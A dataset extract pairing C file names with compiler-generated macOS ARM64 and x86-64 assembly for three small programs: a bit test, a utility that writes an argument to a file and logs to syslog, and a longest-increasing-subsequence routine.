.subsections_via_symbols
| the_stack_data/34582.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ; -- Begin function f
.p2align 2
_f: ; @f
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
mov w8, #1
and w8, w0, w8
strb w8, [sp, #11]
ldrb w8, [sp, #11]
and w8, w8, #0x1
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
mov w8, #1
str w8, [sp, #12]
b LBB0_3
LBB0_2:
str wzr, [sp, #12]
b LBB0_3
LBB0_3:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ## -- Begin function f
.p2align 4, 0x90
_f: ## @f
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %dil, %al
andb $1, %al
movb %al, -5(%rbp)
movb -5(%rbp), %al
andb $1, %al
movzbl %al, %eax
cmpl $1, %eax
jne LBB0_2
## %bb.1:
movl $1, -4(%rbp)
jmp LBB0_3
LBB0_2:
movl $0, -4(%rbp)
LBB0_3:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/62638860.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov x8, x1
mov w1, #0
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x8, [x29, #-16]
mov x0, #0
mov w2, #8
bl _openlog
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _printf
ldr x1, [sp, #32] ; 8-byte Folded Reload
mov w0, #3
bl _syslog$DARWIN_EXTSN
mov w0, #1
bl _exit
LBB0_2:
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
stur x8, [x29, #-24]
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
stur x8, [x29, #-32]
ldur x0, [x29, #-24]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
str x0, [sp, #40]
ldr x8, [sp, #40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
str x0, [sp, #24] ; 8-byte Folded Spill
bl _printf
ldr x1, [sp, #24] ; 8-byte Folded Reload
mov w0, #3
bl _syslog$DARWIN_EXTSN
mov w0, #0
bl _exit
LBB0_4:
ldr x0, [sp, #40]
ldur x8, [x29, #-32]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fprintf
ldur x10, [x29, #-32]
ldur x8, [x29, #-24]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
mov w0, #7
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _syslog$DARWIN_EXTSN
mov w0, #0
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Invalid number of arguments recieved!\n"
l_.str.1: ; @.str.1
.asciz "w"
l_.str.2: ; @.str.2
.asciz "Error opening the file!\n"
l_.str.3: ; @.str.3
.asciz "%s\n"
l_.str.4: ; @.str.4
.asciz "Writing '%s' to '%s'\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
xorl %eax, %eax
movl %eax, %edi
xorl %esi, %esi
movl $8, %edx
callq _openlog
cmpl $3, -8(%rbp)
je LBB0_2
## %bb.1:
leaq L_.str(%rip), %rdi
movq %rdi, -56(%rbp) ## 8-byte Spill
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movb %al, -41(%rbp) ## 1-byte Spill
callq _printf
movq -56(%rbp), %rsi ## 8-byte Reload
## kill: def $ecx killed $eax
movb -41(%rbp), %al ## 1-byte Reload
movl $3, %edi
callq _syslog$DARWIN_EXTSN
movl $1, %edi
callq _exit
LBB0_2:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
movq -24(%rbp), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq %rax, -40(%rbp)
cmpq $0, -40(%rbp)
jne LBB0_4
## %bb.3:
leaq L_.str.2(%rip), %rdi
movq %rdi, -72(%rbp) ## 8-byte Spill
xorl %eax, %eax
movl %eax, -60(%rbp) ## 4-byte Spill
movb %al, -61(%rbp) ## 1-byte Spill
callq _printf
movq -72(%rbp), %rsi ## 8-byte Reload
## kill: def $ecx killed $eax
movb -61(%rbp), %al ## 1-byte Reload
movl $3, %edi
callq _syslog$DARWIN_EXTSN
movl -60(%rbp), %edi ## 4-byte Reload
callq _exit
LBB0_4:
movq -40(%rbp), %rdi
movq -32(%rbp), %rdx
leaq L_.str.3(%rip), %rsi
movb $0, %al
callq _fprintf
movq -32(%rbp), %rdx
movq -24(%rbp), %rcx
movl $7, %edi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _syslog$DARWIN_EXTSN
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Invalid number of arguments recieved!\n"
L_.str.1: ## @.str.1
.asciz "w"
L_.str.2: ## @.str.2
.asciz "Error opening the file!\n"
L_.str.3: ## @.str.3
.asciz "%s\n"
L_.str.4: ## @.str.4
.asciz "Writing '%s' to '%s'\n"
.subsections_via_symbols
| the_stack_data/76699688.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _freopen
mov x9, sp
sub x8, x29, #16
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
mov w8, #1
stur w8, [x29, #-8]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
; Child Loop BB0_7 Depth 2
ldur w8, [x29, #-8]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_12
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
mov x9, sp
sub x8, x29, #20
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
stur wzr, [x29, #-12]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-12]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldursw x9, [x29, #-12]
adrp x8, _array@GOTPAGE
ldr x8, [x8, _array@GOTPAGEOFF]
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur w1, [x29, #-20]
adrp x0, _array@GOTPAGE
ldr x0, [x0, _array@GOTPAGEOFF]
bl _parenthesize
ldur w8, [x29, #-20]
mov w9, #1
str w9, [sp, #20] ; 4-byte Folded Spill
subs w9, w8, #1
adrp x8, _matrix@GOTPAGE
ldr x8, [x8, _matrix@GOTPAGEOFF]
ldr w9, [x8, w9, sxtw #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldr w8, [sp, #20] ; 4-byte Folded Reload
stur w8, [x29, #-12]
b LBB0_7
LBB0_7: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-12]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=2
ldursw x8, [x29, #-12]
mov x9, #40804
mul x9, x8, x9
adrp x8, _matrix@GOTPAGE
ldr x8, [x8, _matrix@GOTPAGEOFF]
add x8, x8, x9
ldur w9, [x29, #-20]
subs w9, w9, #1
ldr w9, [x8, w9, sxtw #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_7
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_1
LBB0_12:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _parenthesize ; -- Begin function parenthesize
.p2align 2
_parenthesize: ; @parenthesize
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _pairwiseLIS@GOTPAGE
ldr x8, [x8, _pairwiseLIS@GOTPAGEOFF]
str x8, [sp, #8] ; 8-byte Folded Spill
adrp x8, _matrix@GOTPAGE
ldr x8, [x8, _matrix@GOTPAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
stur x0, [x29, #-8]
stur w1, [x29, #-12]
stur wzr, [x29, #-20]
b LBB1_1
LBB1_1: ; =>This Loop Header: Depth=1
; Child Loop BB1_3 Depth 2
ldur w8, [x29, #-20]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_8
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldur w8, [x29, #-20]
stur w8, [x29, #-24]
b LBB1_3
LBB1_3: ; Parent Loop BB1_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-24]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_6
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_3 Depth=2
ldur x8, [x29, #-8]
ldursw x9, [x29, #-20]
add x0, x8, x9, lsl #2
ldur w8, [x29, #-24]
ldur w9, [x29, #-20]
subs w8, w8, w9
add w1, w8, #1
bl _lis
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldursw x9, [x29, #-20]
mov x10, #404
mul x9, x9, x10
add x8, x8, x9
ldursw x9, [x29, #-24]
str w0, [x8, x9, lsl #2]
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_3 Depth=2
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB1_3
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB1_1
LBB1_8:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldur w9, [x29, #-12]
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #24]
stur wzr, [x29, #-28]
b LBB1_9
LBB1_9: ; =>This Loop Header: Depth=1
; Child Loop BB1_11 Depth 2
; Child Loop BB1_13 Depth 3
ldur w8, [x29, #-28]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_20
b LBB1_10
LBB1_10: ; in Loop: Header=BB1_9 Depth=1
stur wzr, [x29, #-20]
b LBB1_11
LBB1_11: ; Parent Loop BB1_9 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB1_13 Depth 3
ldur w8, [x29, #-20]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_18
b LBB1_12
LBB1_12: ; in Loop: Header=BB1_11 Depth=2
ldur w8, [x29, #-20]
stur w8, [x29, #-24]
b LBB1_13
LBB1_13: ; Parent Loop BB1_9 Depth=1
; Parent Loop BB1_11 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-24]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_16
b LBB1_14
LBB1_14: ; in Loop: Header=BB1_13 Depth=3
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldursw x9, [x29, #-28]
mov x10, #40804
mul x9, x9, x10
add x8, x8, x9
ldursw x9, [x29, #-20]
mov x10, #404
mul x9, x9, x10
add x9, x8, x9
ldursw x10, [x29, #-24]
mov w8, #0
str w8, [x9, x10, lsl #2]
b LBB1_15
LBB1_15: ; in Loop: Header=BB1_13 Depth=3
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB1_13
LBB1_16: ; in Loop: Header=BB1_11 Depth=2
b LBB1_17
LBB1_17: ; in Loop: Header=BB1_11 Depth=2
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB1_11
LBB1_18: ; in Loop: Header=BB1_9 Depth=1
b LBB1_19
LBB1_19: ; in Loop: Header=BB1_9 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB1_9
LBB1_20:
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldur w9, [x29, #-12]
ldur w11, [x29, #-12]
mov w8, #1
subs w11, w11, #1
str w9, [x10, w11, sxtw #2]
stur w8, [x29, #-28]
b LBB1_21
LBB1_21: ; =>This Loop Header: Depth=1
; Child Loop BB1_23 Depth 2
; Child Loop BB1_25 Depth 3
; Child Loop BB1_30 Depth 4
ldur w8, [x29, #-28]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_41
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_21 Depth=1
ldur w8, [x29, #-12]
subs w8, w8, #1
stur w8, [x29, #-20]
b LBB1_23
LBB1_23: ; Parent Loop BB1_21 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB1_25 Depth 3
; Child Loop BB1_30 Depth 4
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB1_39
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_23 Depth=2
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB1_25
LBB1_25: ; Parent Loop BB1_21 Depth=1
; Parent Loop BB1_23 Depth=2
; => This Loop Header: Depth=3
; Child Loop BB1_30 Depth 4
ldur w8, [x29, #-24]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_37
b LBB1_26
LBB1_26: ; in Loop: Header=BB1_25 Depth=3
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldursw x9, [x29, #-20]
mov x10, #404
mul x9, x9, x10
add x8, x8, x9
ldursw x9, [x29, #-24]
ldr w8, [x8, x9, lsl #2]
ldur w9, [x29, #-28]
add w9, w9, #1
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB1_28
b LBB1_27
LBB1_27: ; in Loop: Header=BB1_25 Depth=3
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldursw x10, [x29, #-20]
mov x11, #404
mul x10, x10, x11
add x8, x8, x10
ldursw x10, [x29, #-24]
ldr w8, [x8, x10, lsl #2]
ldursw x10, [x29, #-28]
mov x12, #40804
mul x10, x10, x12
add x9, x9, x10
ldursw x10, [x29, #-20]
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-24]
str w8, [x9, x10, lsl #2]
b LBB1_29
LBB1_28: ; in Loop: Header=BB1_25 Depth=3
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldursw x9, [x29, #-28]
mov x10, #40804
mul x9, x9, x10
add x8, x8, x9
ldursw x9, [x29, #-20]
mov x10, #404
mul x9, x9, x10
add x9, x8, x9
ldursw x10, [x29, #-24]
mov w8, #0
str w8, [x9, x10, lsl #2]
b LBB1_29
LBB1_29: ; in Loop: Header=BB1_25 Depth=3
ldur w8, [x29, #-20]
str w8, [sp, #32]
b LBB1_30
LBB1_30: ; Parent Loop BB1_21 Depth=1
; Parent Loop BB1_23 Depth=2
; Parent Loop BB1_25 Depth=3
; => This Inner Loop Header: Depth=4
ldr w8, [sp, #32]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_35
b LBB1_31
LBB1_31: ; in Loop: Header=BB1_30 Depth=4
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldursw x8, [x29, #-28]
mov x12, #40804
mul x10, x8, x12
mov x8, x9
add x8, x8, x10
ldursw x10, [x29, #-20]
mov x11, #404
mul x10, x10, x11
add x8, x8, x10
ldrsw x10, [sp, #32]
ldr w8, [x8, x10, lsl #2]
ldursw x10, [x29, #-28]
mul x13, x10, x12
mov x10, x9
add x14, x10, x13
ldr w10, [sp, #32]
add w10, w10, #1
mov w13, #404
smaddl x10, w10, w13, x14
ldursw x13, [x29, #-24]
ldr w10, [x10, x13, lsl #2]
add w8, w8, w10
str w8, [sp, #28]
ldr w8, [sp, #28]
ldursw x10, [x29, #-28]
mul x10, x10, x12
add x9, x9, x10
ldursw x10, [x29, #-20]
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-24]
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB1_33
b LBB1_32
LBB1_32: ; in Loop: Header=BB1_30 Depth=4
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr w8, [sp, #28]
ldursw x10, [x29, #-28]
mov x11, #40804
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-20]
mov x11, #404
mul x10, x10, x11
add x9, x9, x10
ldursw x10, [x29, #-24]
str w8, [x9, x10, lsl #2]
b LBB1_33
LBB1_33: ; in Loop: Header=BB1_30 Depth=4
b LBB1_34
LBB1_34: ; in Loop: Header=BB1_30 Depth=4
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB1_30
LBB1_35: ; in Loop: Header=BB1_25 Depth=3
b LBB1_36
LBB1_36: ; in Loop: Header=BB1_25 Depth=3
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB1_25
LBB1_37: ; in Loop: Header=BB1_23 Depth=2
b LBB1_38
LBB1_38: ; in Loop: Header=BB1_23 Depth=2
ldur w8, [x29, #-20]
subs w8, w8, #1
stur w8, [x29, #-20]
b LBB1_23
LBB1_39: ; in Loop: Header=BB1_21 Depth=1
b LBB1_40
LBB1_40: ; in Loop: Header=BB1_21 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB1_21
LBB1_41:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _lis ; -- Begin function lis
.p2align 2
_lis: ; @lis
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str w1, [sp, #36]
str wzr, [sp, #24]
str wzr, [sp, #32]
b LBB2_1
LBB2_1: ; =>This Loop Header: Depth=1
; Child Loop BB2_3 Depth 2
ldr w8, [sp, #32]
ldr w9, [sp, #36]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_12
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
mov w8, #-1
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
b LBB2_3
LBB2_3: ; Parent Loop BB2_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #20]
ldr w9, [sp, #16]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_8
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_3 Depth=2
ldr w8, [sp, #20]
ldr w9, [sp, #16]
add w8, w8, w9
mov w9, #2
sdiv w8, w8, w9
str w8, [sp, #12]
ldrsw x9, [sp, #12]
adrp x8, _lisArray@GOTPAGE
ldr x8, [x8, _lisArray@GOTPAGEOFF]
ldr w8, [x8, x9, lsl #2]
ldr x9, [sp, #40]
ldrsw x10, [sp, #32]
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_3 Depth=2
ldr w8, [sp, #12]
str w8, [sp, #20]
b LBB2_7
LBB2_6: ; in Loop: Header=BB2_3 Depth=2
ldr w8, [sp, #12]
str w8, [sp, #16]
b LBB2_7
LBB2_7: ; in Loop: Header=BB2_3 Depth=2
b LBB2_3
LBB2_8: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #40]
ldrsw x9, [sp, #32]
ldr w8, [x8, x9, lsl #2]
ldrsw x10, [sp, #16]
adrp x9, _lisArray@GOTPAGE
ldr x9, [x9, _lisArray@GOTPAGEOFF]
str w8, [x9, x10, lsl #2]
ldr w8, [sp, #16]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_10
b LBB2_9
LBB2_9: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB2_10
LBB2_10: ; in Loop: Header=BB2_1 Depth=1
b LBB2_11
LBB2_11: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB2_1
LBB2_12:
ldr w0, [sp, #24]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "mnois.in"
l_.str.1: ; @.str.1
.asciz "r"
l_.str.2: ; @.str.2
.asciz "%d"
.comm _array,404,2 ; @array
.comm _matrix,4121204,2 ; @matrix
l_.str.3: ; @.str.3
.asciz " %d"
l_.str.4: ; @.str.4
.asciz "\n"
.comm _pairwiseLIS,40804,2 ; @pairwiseLIS
.comm _lisArray,404,2 ; @lisArray
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _freopen
leaq L_.str.2(%rip), %rdi
leaq -16(%rbp), %rsi
movb $0, %al
callq _scanf
movl $1, -8(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
## Child Loop BB0_7 Depth 2
movl -8(%rbp), %eax
cmpl -16(%rbp), %eax
jg LBB0_12
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.2(%rip), %rdi
leaq -20(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -12(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -12(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movslq -12(%rbp), %rax
movq _array@GOTPCREL(%rip), %rsi
shlq $2, %rax
addq %rax, %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %esi
movq _array@GOTPCREL(%rip), %rdi
callq _parenthesize
movl -20(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
movq _matrix@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -12(%rbp)
LBB0_7: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -12(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_10
## %bb.8: ## in Loop: Header=BB0_7 Depth=2
movslq -12(%rbp), %rcx
movq _matrix@GOTPCREL(%rip), %rax
imulq $40804, %rcx, %rcx ## imm = 0x9F64
addq %rcx, %rax
movl -20(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
## %bb.9: ## in Loop: Header=BB0_7 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_7
LBB0_10: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
## %bb.11: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_1
LBB0_12:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _parenthesize ## -- Begin function parenthesize
.p2align 4, 0x90
_parenthesize: ## @parenthesize
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $0, -20(%rbp)
LBB1_1: ## =>This Loop Header: Depth=1
## Child Loop BB1_3 Depth 2
movl -20(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_8
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
movl %eax, -24(%rbp)
LBB1_3: ## Parent Loop BB1_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -24(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_6
## %bb.4: ## in Loop: Header=BB1_3 Depth=2
movq -8(%rbp), %rdi
movslq -20(%rbp), %rax
shlq $2, %rax
addq %rax, %rdi
movl -24(%rbp), %esi
subl -20(%rbp), %esi
addl $1, %esi
callq _lis
movl %eax, %edx
movslq -20(%rbp), %rcx
movq _pairwiseLIS@GOTPCREL(%rip), %rax
imulq $404, %rcx, %rcx ## imm = 0x194
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.5: ## in Loop: Header=BB1_3 Depth=2
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB1_3
LBB1_6: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_7
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_1
LBB1_8:
movl -12(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
movq _pairwiseLIS@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %eax
movl %eax, -40(%rbp)
movl $0, -28(%rbp)
LBB1_9: ## =>This Loop Header: Depth=1
## Child Loop BB1_11 Depth 2
## Child Loop BB1_13 Depth 3
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_20
## %bb.10: ## in Loop: Header=BB1_9 Depth=1
movl $0, -20(%rbp)
LBB1_11: ## Parent Loop BB1_9 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB1_13 Depth 3
movl -20(%rbp), %eax
